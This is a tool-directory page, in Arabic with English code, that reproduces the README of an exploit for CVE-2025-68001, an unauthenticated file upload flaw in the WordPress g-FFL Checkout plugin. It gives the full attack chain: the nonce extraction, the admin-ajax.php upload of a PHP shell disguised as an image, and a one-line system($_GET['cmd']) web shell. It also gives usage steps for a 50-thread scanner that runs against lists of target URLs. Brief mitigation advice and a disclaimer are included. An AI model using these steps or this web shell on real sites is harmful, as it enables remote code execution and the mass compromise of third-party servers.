Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68001 — WordPress g-FFL Checkout Plugin <= 2.1.0 معرضة لثغرة رفع ملف تعسفي ذات أولوية عالية. | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-68001
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubnxploited/cve-2025-68001

CVE-2025-68001

WordPress g-FFL Checkout Plugin <= 2.1.0 معرضة لثغرة رفع ملف تعسفي ذات أولوية عالية.

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-68001

إضافة WordPress g-FFL Checkout <= 2.1.0 معرضة لثغرة رفع ملف تعسفي عالية الأولوية

root@kitploit:~
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 

Telegram CVE Python License


📡 ابق في المقدمة. انضم إلى @KNxploited على تيليغرام — مصدرك الحصري لأحدث CVEs والثغرات الصفرية وأبحاث الاستغلال المتطورة. يتم تحديثه باستمرار. ليس للجميع.


📋 نظرة عامة

CVE-2025-68001 هي ثغرة حرجة من نوع رفع ملف تعسفي بدون مصادقة تم اكتشافها في إضافة g-FFL Checkout لووردبريس بواسطة garidium.

تسمح الثغرة لمهاجم عن بعد غير مصادق برفع ملفات تعسفية — بما في ذلك شيلات الويب — إلى الخادم الهدف عبر إجراء AJAX ffl_upload_document، مما يؤدي إلى تنفيذ أوامر عن بعد كامل (RCE).

الحقلالتفاصيل
معرف CVECVE-2025-68001
الإضافةg-FFL Checkout (g-ffl-checkout)
الإصدارات المتأثرةn/a حتى <= 2.1.0
نوع الثغرةرفع ملفات غير مقيد
التأثيرتنفيذ أوامر عن بعد (RCE)
المصادقةغير مطلوبة
شدة CVSSحرج
الباحثNxploited

⚙️ كيف يعمل

يتبع الاستغلال سلسلة هجوم متعددة الخطوات دقيقة:

root@kitploit:~
1. GET /checkout
      ↓
   Extract `checkout_nonce` from inline JavaScript data

2. POST /wp-admin/admin-ajax.php
      action=ffl_upload_document
      nonce=<extracted_nonce>
      document_type=document
      document=<shell.php disguised as image/png>
      ↓
   Server stores the file without extension or MIME validation

3. Parse JSON response
      ↓
   Extract uploaded file path / unique filename

4. Access uploaded shell via HTTP
      ↓
   Remote Code Execution achieved ✔️

تعرض الإضافة نقطة نهاية AJAX ffl_upload_document التي:

  • تقبل رفع الملفات بدون فحص مصادقة
  • لا تؤدي أي التحقق من نوع الملف على الخادم
  • تُرجع مسار الملف المخزن في استجابتها JSON

🔧 المتطلبات

قم بتثبيت جميع التبعيات قبل التشغيل:

root@kitploit:~
pip install requests rich
التبعيةالغرض
requestsمعالجة طلبات HTTP والجلسات
richواجهة طرفية، أشرطة تقدم، لوحات
threadingمعالجة الأهداف متعددة الخيوط

يتطلب Python 3.8+.


📂 هيكل الملفات

root@kitploit:~
CVE-2025-68001/
├── CVE-2025-68001.py       # Main exploit script
├── shell.php               # Web shell to upload (you provide this)
├── list.txt                # Target URLs (one per line)
└── success_results.txt     # Auto-generated results output

🚀 الاستخدام

الخطوة 1 — تحضير الأهداف

أنشئ ملف list.txt بعنوان URL واحد لكل سطر:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

يقوم السكربت تلقائياً بإضافة http:// إذا لم يتم توفير بروتوكول.


الخطوة 2 — تحضير الشيل

ضع شيل الويب PHP الخاص بك في نفس المجلد. مثال لشيل بسيط:

root@kitploit:~
<?php system($_GET['cmd']); ?>

احفظه باسم shell.php (أو أي اسم — سيُطلب منك إدخاله).


الخطوة 3 — تشغيل الاستغلال

root@kitploit:~
python CVE-2025-68001.py

سيُطلب منك تفاعلياً:

root@kitploit:~
Enter targets file name (default: list.txt):
> list.txt

Enter shell file name to upload (default: shell.php):
> shell.php

Enter number of threads (default: 50):
> 20

الخطوة 4 — مراجعة النتائج

يتم حفظ الاستغلالات الناجحة تلقائياً في success_results.txt:

root@kitploit:~
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php

يحتوي كل سطر على:

  • عنوان URL الهدف
  • مسار الملف المخزن على الخادم
  • اسم الملف الفريد الذي عينه الخادم
  • اسم الملف الأصلي المرفوع

🖥️ مرجع معلمات السكربت

المطالبةالافتراضيالوصف
ملف الأهدافlist.txtملف يحتوي على عناوين URL الهدف
ملف الشيلshell.phpشيل PHP لرفعه إلى الهدف
عدد الخيوط50العمال المتزامنون (الحد الأقصى: 50)

📊 مثال على الإخراج

root@kitploit:~
✔  https://victim.com  — /checkout reachable. Trying exploit...

┌─────────────────────────────────────────────────────┐
│                      Success                        │
│  https://victim.com                                 │
│  Original Name:  shell.php                          │
│  Unique Name:    a7f3c1d9e.php                      │
│  Stored Path:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

All targets processed ✔️. Results saved to: success_results.txt

🔍 مسار الكود الضعيف (تقني)

تقع الثغرة في معالج AJAX للإضافة المسجل بدون فحوصات صلاحية:

root@kitploit:~
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce verified from /checkout page (publicly accessible)
    // No MIME type validation
    // No extension whitelist/blacklist
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}

🛡️ التخفيف والمعالجة

إذا كنت مالك موقع أو مطور، قم باتخاذ الخطوات التالية فوراً:

  • ✅ قم بتحديث إضافة g-ffl-checkout إلى نسخة مصححة (> 2.1.0) إن وجدت
  • ✅ عطل الإضافة حتى يتم تأكيد وجود تصحيح
  • ✅ قيد أذونات التنفيذ في مجلدات الرفع (مثل قواعد .htaccess)
  • ✅ نفذ التحقق من نوع الملف على الخادم والقائمة البيضاء الصارمة للامتدادات
  • ✅ راقب مجلدات الرفع بحثاً عن ملفات .php مشبوهة
  • ✅ فعّل قواعد WAF لمنع طلبات رفع ملفات AJAX غير المصادقة

⚠️ إخلاء مسؤولية

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL AND AUTHORIZED
SECURITY RESEARCH PURPOSES ONLY.

By using this script, you explicitly agree to the following:

  • You have EXPLICIT written permission from the target system owner.
  • You are operating in a controlled lab or authorized penetration testing engagement.
  • You will NOT use this tool against any system you do not own or have legal
    authorization to test.
  • The author (Nxploited) holds ZERO liability for any damage, data loss,
    legal consequences, or misuse resulting from this tool.

Unauthorized use of this tool against systems without permission is ILLEGAL
and may violate laws including but not limited to:
  — Computer Fraud and Abuse Act (CFAA)
  — EU Directive on Attacks Against Information Systems
  — And equivalent laws in your jurisdiction.

USE RESPONSIBLY. HACK ETHICALLY.

👤 المؤلف

الاسم المستعارNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 تابع @KNxploited على تيليغرام لاستقبال أحدث الإفصاحات عن الثغرات، وإصدارات الاستغلالات، والأبحاث الأمنية — قبل أي شخص آخر.


معمول بدقة بواسطة Nxploited · للاستخدام التعليمي فقط
تنزيل الأداة